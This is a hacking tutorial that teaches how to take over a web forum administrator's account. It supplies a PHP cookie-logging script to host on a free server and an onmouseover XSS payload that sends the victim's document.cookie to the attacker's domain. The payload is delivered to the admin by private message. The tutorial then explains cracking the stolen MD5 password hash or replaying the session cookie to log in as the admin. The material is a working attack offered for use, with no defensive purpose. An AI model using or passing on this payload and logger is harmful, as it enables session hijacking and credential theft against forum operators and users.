Tools needed:
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/)
A Free Server with PHP (http://www.t35.com)

1 - Make a file with notepad
Insert this code into it:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777 lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>

Save it as lol.php and upload it to your free server at t35.com.

2 - Now find a forum that you want to hack (if you see that html is off by default like in this picture forget it)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)

3 - This is the code you have to pm the admin

' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='

http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg



Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.



When the admin puts his mouse over this code it will redirect him to your php file and it will show him a blank screen, you can modify that so it doesnt look so suspicious.



4 - Now find the admin or whoever you want to hack, pm him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.



5 - Once he clicks the message it will make a file in your server called ****.txt, open it.

You will see some code that looks like this:

Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991



A - The easiest way is to copy the password hash which in this case is

3921c75b299268bd87f48ec8c289c3f0

Copy that hash

go to md5.rednoize.com or any other cracker and paste it there, if nothing shows up, you will have to use http headers (in example B) to login as the admin.



B - Go to the forum you hacked, click on tools -> live http headers (assuming you have firefox and http headers installed)



Now refresh the page, at the top of the http headers screen you will see something like this:

http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)



Click on Replay



Delete all the code that comes after

cookie:



Replace it with the code from step 5 that you recieved from your server's log.